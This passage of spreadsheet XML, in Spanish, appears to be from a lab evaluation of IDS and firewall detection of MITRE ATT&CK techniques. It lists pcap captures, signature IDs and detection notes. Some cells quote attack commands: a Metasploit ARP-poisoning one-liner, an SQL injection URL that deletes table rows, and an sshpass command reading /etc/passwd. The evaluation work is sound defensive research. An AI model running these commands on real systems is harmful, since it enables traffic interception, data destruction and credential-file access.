        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza los dos flujos ICMP. Estos flujos no son relevantes para el ataque</t>
    </r>
  </si>
  <si>
    <t>Suplantación del puente raíz</t>
  </si>
  <si>
    <t>T1557-Puente_raiz_[1].pcapng</t>
  </si>
  <si>
    <t>Si el ataque viene seguido de suplantaciones ARP, con el uso de preprocesadores de Snort resulta posible su detección. En caso de que el ataque se centre únicamente en el establecimiento del atacante como puente raíz, no existe mecanismo de detección</t>
  </si>
  <si>
    <t>Establecimiento de atacante como puente raíz</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.4.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.6</t>
  </si>
  <si>
    <t>La suplantacion de un puente raiz siempre se considera como un ataque</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la diferencia entre los flujos de la captura y los flujos detectados por ambas versiones de Snort se debe a la naturaleza de los flujos. Éstos son flujos STP, HPEXT y ICMP, causando que no todos sean analizados (aunque puedan ser relevantes son flujos en su mayoría de capa 2, por lo que es previsible que no sean analizados)</t>
    </r>
  </si>
  <si>
    <t>Redirección</t>
  </si>
  <si>
    <t>ettercap, netwox</t>
  </si>
  <si>
    <t>T1557-Redireccion_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla personalizada que detecte envío de paquetes ICMP Redirect por parte de un equipo que no debería intervenir en labores de redirección </t>
  </si>
  <si>
    <t>Manual [1] /  2.2.2.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.8</t>
  </si>
  <si>
    <t>La dredireccion siempre se considera como un ataque</t>
  </si>
  <si>
    <t>29456, 384, 366, 408, 2100469, 2100472, 2100366, 2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>2100469, 2100472, 2100366, 2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>Envenenamiento ARP</t>
  </si>
  <si>
    <t>Arpspoof</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning1_[2].pcapng</t>
  </si>
  <si>
    <t>Envenenamiento de tablas ARP mediante Arpspoof.</t>
  </si>
  <si>
    <t>Manual [2] /  3.4.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.32</t>
  </si>
  <si>
    <t>El envenamiento ARP siempre es un ataque</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP. Este flujo no es relevante para el ataque</t>
    </r>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning2_[3].pcapng</t>
  </si>
  <si>
    <t>Se realiza un ataque MITM, mediante el envenanamiento de las tablas de ARP caché de un equipo y su gateway. De esta toda se redirige todo el tráfico para que pase a través del equipo del atacante. Comando: msfconsole -x "use auxiliary/spoof/arp/arp_poisoning; set BIDIRECTIONAL true; set interface eth1; set DHOSTS 192.168.1.2; set SHOSTS 192.168.1.1; run -j -z; sleep 5; kill 0; exit"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.19</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.19 y Manual [5] / C.33</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.19.5 y Manual [5] / 5.7.3</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Secuestro de sesión RDP mediante tscon.exe</t>
  </si>
  <si>
    <t>tscon.exe</t>
  </si>
  <si>
    <t>T1563.002-RDPHijacking_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el intento de establecimiento de sesiones RDP poco convenciales, haciendo uso de los protocolos mínimos de seguridad.</t>
  </si>
  <si>
    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
  </si>
  <si>
    <t>Manual [5] /  4.7.1</t>
  </si>
  <si>
    <t>Manual [5] / C.12</t>
  </si>
  <si>
    <t>Manual [5] /  5.9.3</t>
  </si>
  <si>
    <t>El secuestro de una sesion RDP siempre se considera como un ataque</t>
  </si>
  <si>
    <t>1917, 1448</t>
  </si>
  <si>
    <t>1917, 1448, 2001330, 2027413</t>
  </si>
  <si>
    <t>1917, 1448, 2001330</t>
  </si>
  <si>
    <t>2001330, 2027413, 1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485</t>
  </si>
  <si>
    <t>2001330, 1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485</t>
  </si>
  <si>
    <t>1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485, 2002752, 2002749, 2101620, 2101917, 2101448, 2101447, 2001329, 2001330, 2027413, 2003012, 2003020, 2001117, 2034857, 2044666</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101620, 2101917, 2001117</t>
  </si>
  <si>
    <t>1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485, 2101448, 2101447, 2001329, 2001330, 2027413, 2003012, 2003020, 2034857, 2044666</t>
  </si>
  <si>
    <t>1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485, 2002752, 2002749, 2101620, 2101917, 2101448, 2101447, 2001329, 2001330, 2003012, 2003020, 2001117, 2044666</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>2027413, 2034857</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la diferencia en los números de flujos detectados se debe a flujos ICMP no identificados por Snortv2 y a flujos de capa 2 identificados por tranalyzer (no relevantes para los resultados)</t>
    </r>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>T1565.001-SQL_inyection_[3].pcapng</t>
  </si>
  <si>
    <t>"El objetivo es generar daño en la BBDD. Queremos borrar lineas de una tabla. Comando: http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20DELETE%20FROM%20contactos%20WHERE%20num=3--"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.8</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.8.4 y Manual [5] / C.34</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.8.5 y Manual [5] / 5.13.1</t>
  </si>
  <si>
    <t>50447, 2006443</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006443, 50447</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Envío de emails con documentos maliciosos</t>
  </si>
  <si>
    <t>T1566.001-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Si los mensajes contienen determinados patrones como intentos de creación de Shells remotos sí que pueden ser detectados por los cortafuegos en base a reglas que detecten cadenas específicas en los paquetes</t>
  </si>
  <si>
    <t>Manual [5] /  5.3.5</t>
  </si>
  <si>
    <t>En general, el envio de documentos por email puede verse como tráfico legitimo pero dependiendo de las circunstancias puede ser un ataque</t>
  </si>
  <si>
    <t>1292, 46983</t>
  </si>
  <si>
    <t>1292, 46983, 47398</t>
  </si>
  <si>
    <t>1292, 46983,47398</t>
  </si>
  <si>
    <t>1292, 2002749, 2002752, 2101292, 46983, 47398</t>
  </si>
  <si>
    <t>1292, 2101292, 46983, 47398</t>
  </si>
  <si>
    <t>1292, 2101292, 2002752, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la explicación a la diferencia entre los flujos detectados por Snortv2 (2) y Snortv3 (9) es sencilla. Atendiendo a puertos y direcciones tan sólo hay 2 flujos distintos, la clave está en que estas sesiones TCP que conforman los flujos se cierran y se vuelven a abrir, lo que causa que Snortv3 y tranalyzer lo consideren como nuevos flujos, no así Snortv2. Los resultados no se ven afectados.</t>
    </r>
  </si>
  <si>
    <t>29247, 12449</t>
  </si>
  <si>
    <t>32296, 54790</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> Las alertas detectadas se corresponden al establecimiento de una sesión posterior al phishing</t>
    </r>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Obtener un acceso inicial mediante ingeniería social utilizando un enlace adjunto en un correo que descargue un fichero que establezca una sesión al equipo víctima</t>
  </si>
  <si>
    <t>SEToolKit, Metasploit</t>
  </si>
  <si>
    <t>T1566.002-Spearphishing_Link_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos que contengan contenido malware</t>
  </si>
  <si>
    <t>Servidor de correo mediante Postfix, Thunderbird, Bind, Dovecot</t>
  </si>
  <si>
    <t>Manual [5] /  4.2.2</t>
  </si>
  <si>
    <t>Manual [5] / C.13</t>
  </si>
  <si>
    <t>2043343, 2044076, 2016141, 2021076, 2018959, 2025644</t>
  </si>
  <si>
    <t>2043343, 2044076, 2016141, 2021076, 2018959, 2025644, 15935, 59597, 50447</t>
  </si>
  <si>
    <t>2043343, 2044076, 2016141, 2021076, 2018959, 2025644, 59597</t>
  </si>
  <si>
    <t>50447, 15935</t>
  </si>
  <si>
    <t xml:space="preserve">15935, 59597, 50447, 2043343, 2044076, 2002752, 2002749, 2001117, 2016141, 2003595, 2021076, 2018959, 2025644, 2101200, 2101620
</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117, 20101620</t>
  </si>
  <si>
    <t xml:space="preserve">15935, 59597, 50447, 2043343, 2044076, 2016141, 2003595, 2021076, 2018959, 2025644, 2101200
</t>
  </si>
  <si>
    <t xml:space="preserve">59597, 2043343, 2044076, 2016141, 2003595, 2021076, 2018959, 2025644
</t>
  </si>
  <si>
    <t>50447, 15935, 2002752, 2002749, 2001117, 2101200, 2101620</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP, que es el que falta para alcanzar los 170 flujos totales de la captura</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF34A853"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">86533, 54752, 39909, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="7"/>
        <sz val="14.0"/>
      </rPr>
      <t>599800, 52020</t>
    </r>
  </si>
  <si>
    <t>86533, 54752, 39909, 599800, 52020</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> Paloalto detecta un shell de comandos mediante TCP, lo cual es el acceso inicial realizado por el atacante posterior al phishing. Los flujos detectados como ataque colateral no cuentan para el análisis de detecciones</t>
    </r>
  </si>
  <si>
    <t>Exfiltration over Web Service</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltrar datos de un equipo a la nube</t>
  </si>
  <si>
    <t>Google Drive</t>
  </si>
  <si>
    <t>T1567.002-Exfiltration_To_Cloud_Storage_[5].pcapng</t>
  </si>
  <si>
    <t>Transferir ficheros de un equipo a la nube</t>
  </si>
  <si>
    <t>Manual [5] /  4.9.3</t>
  </si>
  <si>
    <t>Manual [5] / C.14</t>
  </si>
  <si>
    <t>Manual [5] /  5.12.8</t>
  </si>
  <si>
    <t>La exfiltracion de datos a la nube puede considerarse como una actividad legítima en determinados casos. Sin embargo, tambien puede ser una manera de ataque</t>
  </si>
  <si>
    <t>42533, 38131</t>
  </si>
  <si>
    <t>google-drive-web-base -- file sharing</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
  </si>
  <si>
    <t>bind, Metasploit</t>
  </si>
  <si>
    <t>T1568-fastFluxDNS_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte una respuesta DNS que devuelva varias direcciones IP. Es decir, detecta el comportamiento de un DNS Round Robin</t>
  </si>
  <si>
    <t>Servidor DNS "Round Robin"</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.4</t>
  </si>
  <si>
    <t>Manual [5] / C.15</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.10</t>
  </si>
  <si>
    <t>El ataque del pcap permuta entre 2 IPs de servidores DNS. En algunos entornos, esto puede ser un funcionamiento legítimo</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2100366, 57756, 15935</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 57756</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2100366, 15935</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 57756, 15935 2002752, 2002749, 2100366, 2100384, 2100408, 2101620</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101620, 2100366, 2100384, 2100408</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 57756, 15935</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 15935 2002752, 2002749, 2100366, 2100384, 2100408, 2101620</t>
  </si>
  <si>
    <t>2002752, 2100384, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no detecta tres flujos ICMP (irrelevantes para el ataque)</t>
    </r>
  </si>
  <si>
    <t>PaloAlto detecta como amenaza con SID 9999 las URLs correspondientes a la sesión C2 utilizando el dominio con Fast Flux. Sin embargo, no detecta que se esté utilizando el fast flux en si. Mediante esta alerta podría considerarse el ataque revisando las direcciones IP destino correspondientes a la alerta y que todas se dirigen a un mismo dominio que varía la IP. Sin embargo, esta alerta se considera FP porque no detecta claramente el ataque</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>T1569-System_services_service_execution_[4].pcapng</t>
  </si>
  <si>
    <t>SVCCTL</t>
  </si>
  <si>
    <t xml:space="preserve">Existen múltiples métodos de detección. Como ejemplos:
        Regla que detecte la cadena “PSEXESVC” en el contenido de mensajes SMBv2
        Regla que detecte archivos ejecutables en mensajes SMB
</t>
  </si>
  <si>
    <t>Manual [4] /  3.6</t>
  </si>
  <si>
    <t>Manual [4] / B.6</t>
  </si>
  <si>
    <t>Manual [4] / 4.6</t>
  </si>
  <si>
    <t>La creación de un servicio o proceso de forma remota es legítima cuando el usuario permite o autoriza dicho movimiento</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF434343"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF434343"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF434343"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF434343"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
  </si>
  <si>
    <t>2025701, 2025699</t>
  </si>
  <si>
    <t>2025701, 2025699, 459</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385</t>
    </r>
  </si>
  <si>
    <t>459, 44489, 2025701, 2025699, 26385</t>
  </si>
  <si>
    <t>2025701, 2025699, 26385</t>
  </si>
  <si>
    <t>459, 44489</t>
  </si>
  <si>
    <t>2010781, 2027237, 30281</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">. 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385, 2101620, 2100459, 2044666, 2051116, 2024510, 2002752, 2002749, 2027191</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">. 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385, 2100459, 2044666, 2051116, 2024510, 2027191</t>
    </r>
  </si>
  <si>
    <t>26385, 2025701, 2024510</t>
  </si>
  <si>
    <t>459, 44489, 2002752, 2002749, 2101620, 2100459, 2044666, 2051116, 2025669</t>
  </si>
  <si>
    <t>30281, 2010781, 2027237</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no identifica los flujos ICMP (aunque sí los analiza)</t>
    </r>
  </si>
  <si>
    <t>25853, 52166</t>
  </si>
  <si>
    <t>92322, 36540</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
  </si>
  <si>
    <t>T1570-Lateral_Tool_Transfer_[5].pcapng</t>
  </si>
  <si>
    <t>Ejecución de comandos de forma remota (no constituyen el ataque en sí) -  T1059</t>
  </si>
  <si>
    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
  </si>
  <si>
    <t>Manual [5] /  4.7.2</t>
  </si>
  <si>
    <t>Manual [5] / C.16</t>
  </si>
  <si>
    <t>Manual [5] /  5.9.4</t>
  </si>
  <si>
    <t>La transferencia de herramientas entre equipos no necesariamente implica un ataque.</t>
  </si>
  <si>
    <t>2000418, 2002752, 2002749, 2051116, 2000418, 2011803</t>
  </si>
  <si>
    <t>2000418, 2051116, 2000418, 2011803</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta adecuadamente el uso de comandos de forma remota, pero la técnica no tiene como objetivo del ataque esta acción, sino la transferencia lateral de herramientas. Esta última no es detectada por FortiGate.</t>
    </r>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Sesión SSH en puerto 2200</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>T1571-SSH_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de SSH sobre un puerto no estándar</t>
  </si>
  <si>
    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.9.1</t>
  </si>
  <si>
    <t>Manual [5] / C.35</t>
  </si>
  <si>
    <t>El uso de SSH en otros puertos es una acción legítima muy común en ciertos entornos</t>
  </si>
  <si>
    <t>2002752, 2002749, 13586</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Detección APP-CTRL: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Si bien es cierto que FG no indica expresamente que la sesión SSH se está estableciendo en un puerto alto, el control de aplicaciones marca tanto el uso de SSH como el del puerto 2200, por lo que debe darse por válida</t>
    </r>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
  </si>
  <si>
    <t>SSH, Metasploit</t>
  </si>
  <si>
    <t>T1572-Protocol_Tunneling_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de un protocolo para tunelizar comunicaciones C&amp;C</t>
  </si>
  <si>
    <t>Tunelizar una conexion mediante SSH</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.6</t>
  </si>
  <si>
    <t>Manual [5] / C.17</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.12</t>
  </si>
  <si>
    <t>La tunelización de un canal no necesariamente es un ataque. Un administrador de red puede utilizar SSH por ejemplo para acceder a otro equipo y es lo mismo que un atacante realizaría</t>
  </si>
  <si>
    <t>2002752, 2002749, 2000418, 2011803</t>
  </si>
  <si>
    <t>2000418, 2011803</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
